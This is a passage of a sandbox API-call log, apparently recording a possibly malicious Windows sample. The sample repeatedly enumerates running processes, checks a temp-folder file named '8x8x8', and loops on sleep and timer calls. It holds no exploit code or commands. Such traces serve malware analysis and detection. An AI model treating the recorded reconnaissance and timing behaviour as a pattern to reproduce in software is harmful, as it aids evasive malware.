szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0285.708] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0285.709] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0285.710] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0285.711] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0285.712] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0285.713] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0285.714] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.715] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0285.715] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.716] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0285.717] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0285.718] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0285.719] CloseHandle (hObject=0x294) returned 1 [0285.719] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0285.719] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0285.719] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0285.722] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.722] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0285.723] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0285.724] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0285.725] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0285.726] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0285.727] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0285.728] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0285.729] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0285.730] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0285.746] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0285.746] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0285.746] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0285.746] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0285.746] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0285.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0285.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0285.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0285.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0285.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0285.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0285.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0285.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0285.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0285.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0285.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0285.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0285.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0285.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0285.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0285.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0285.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0285.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0285.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0285.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0285.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0285.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0285.748] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0285.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0285.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0285.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0285.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0285.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0285.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0285.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0285.749] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0285.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0285.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0285.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0285.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0285.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0285.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0285.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0285.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0285.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0285.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0285.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0285.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0285.750] timeGetTime () returned 0x477ad [0285.750] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.750] Sleep (dwMilliseconds=0xa) [0285.762] timeGetTime () returned 0x477bd [0285.762] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.762] Sleep (dwMilliseconds=0xa) [0285.777] timeGetTime () returned 0x477cd [0285.777] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.777] Sleep (dwMilliseconds=0xa) [0285.794] timeGetTime () returned 0x477dc [0285.794] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.794] Sleep (dwMilliseconds=0xa) [0285.808] timeGetTime () returned 0x477ec [0285.808] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.808] Sleep (dwMilliseconds=0xa) [0285.824] timeGetTime () returned 0x477fb [0285.824] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.824] Sleep (dwMilliseconds=0xa) [0285.839] timeGetTime () returned 0x4780b [0285.839] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0285.839] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0285.840] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0285.840] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0285.840] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0285.840] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.840] Sleep (dwMilliseconds=0xa) [0285.855] timeGetTime () returned 0x4781b [0285.855] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.855] Sleep (dwMilliseconds=0xa) [0285.879] timeGetTime () returned 0x4782a [0285.879] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.879] Sleep (dwMilliseconds=0xa) [0285.886] timeGetTime () returned 0x4783a [0285.886] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.886] Sleep (dwMilliseconds=0xa) [0285.902] timeGetTime () returned 0x47849 [0285.902] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.902] Sleep (dwMilliseconds=0xa) [0285.917] timeGetTime () returned 0x47859 [0285.917] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.917] Sleep (dwMilliseconds=0xa) [0285.946] timeGetTime () returned 0x47869 [0285.947] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.947] Sleep (dwMilliseconds=0xa) [0285.948] timeGetTime () returned 0x47878 [0285.948] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.949] Sleep (dwMilliseconds=0xa) [0285.970] timeGetTime () returned 0x47888 [0285.970] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.970] Sleep (dwMilliseconds=0xa) [0285.980] timeGetTime () returned 0x47897 [0285.980] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.980] Sleep (dwMilliseconds=0xa) [0285.995] timeGetTime () returned 0x478a7 [0285.995] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.995] Sleep (dwMilliseconds=0xa) [0286.021] timeGetTime () returned 0x478b7 [0286.021] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.021] Sleep (dwMilliseconds=0xa) [0286.026] timeGetTime () returned 0x478c6 [0286.026] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.026] Sleep (dwMilliseconds=0xa) [0286.042] timeGetTime () returned 0x478d6 [0286.042] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.042] Sleep (dwMilliseconds=0xa) [0286.058] timeGetTime () returned 0x478e5 [0286.058] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.058] Sleep (dwMilliseconds=0xa) [0286.073] timeGetTime () returned 0x478f5 [0286.073] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.073] Sleep (dwMilliseconds=0xa) [0286.089] timeGetTime () returned 0x47905 [0286.089] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.089] Sleep (dwMilliseconds=0xa) [0286.104] timeGetTime () returned 0x47914 [0286.104] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.104] Sleep (dwMilliseconds=0xa) [0286.120] timeGetTime () returned 0x47924 [0286.120] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.120] Sleep (dwMilliseconds=0xa) [0286.136] timeGetTime () returned 0x47933 [0286.136] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.136] Sleep (dwMilliseconds=0xa) [0286.151] timeGetTime () returned 0x47943 [0286.151] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.151] Sleep (dwMilliseconds=0xa) [0286.167] timeGetTime () returned 0x47953 [0286.167] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.167] Sleep (dwMilliseconds=0xa) [0286.184] timeGetTime () returned 0x47962 [0286.184] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.184] Sleep (dwMilliseconds=0xa) [0286.198] timeGetTime () returned 0x47972 [0286.198] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.198] Sleep (dwMilliseconds=0xa) [0286.215] timeGetTime () returned 0x47981 [0286.215] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.215] Sleep (dwMilliseconds=0xa) [0286.229] timeGetTime () returned 0x47991 [0286.229] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.229] Sleep (dwMilliseconds=0xa) [0286.245] timeGetTime () returned 0x479a1 [0286.245] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.245] Sleep (dwMilliseconds=0xa) [0286.260] timeGetTime () returned 0x479b0 [0286.260] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.260] Sleep (dwMilliseconds=0xa) [0286.276] timeGetTime () returned 0x479c0 [0286.276] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.276] Sleep (dwMilliseconds=0xa) [0286.292] timeGetTime () returned 0x479cf [0286.292] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.292] Sleep (dwMilliseconds=0xa) [0286.308] timeGetTime () returned 0x479df [0286.308] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.308] Sleep (dwMilliseconds=0xa) [0286.323] timeGetTime () returned 0x479ef [0286.323] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.323] Sleep (dwMilliseconds=0xa) [0286.338] timeGetTime () returned 0x479fe [0286.339] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.339] Sleep (dwMilliseconds=0xa) [0286.354] timeGetTime () returned 0x47a0e [0286.354] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.354] Sleep (dwMilliseconds=0xa) [0286.370] timeGetTime () returned 0x47a1d [0286.370] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.370] Sleep (dwMilliseconds=0xa) [0286.385] timeGetTime () returned 0x47a2d [0286.385] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.385] Sleep (dwMilliseconds=0xa) [0286.401] timeGetTime () returned 0x47a3d [0286.401] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.401] Sleep (dwMilliseconds=0xa) [0286.416] timeGetTime () returned 0x47a4c [0286.417] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.417] Sleep (dwMilliseconds=0xa) [0286.432] timeGetTime () returned 0x47a5c [0286.432] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.432] Sleep (dwMilliseconds=0xa) [0286.448] timeGetTime () returned 0x47a6b [0286.448] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.448] Sleep (dwMilliseconds=0xa) [0286.463] timeGetTime () returned 0x47a7b [0286.463] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.463] Sleep (dwMilliseconds=0xa) [0286.479] timeGetTime () returned 0x47a8b [0286.479] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.479] Sleep (dwMilliseconds=0xa) [0286.494] timeGetTime () returned 0x47a9a 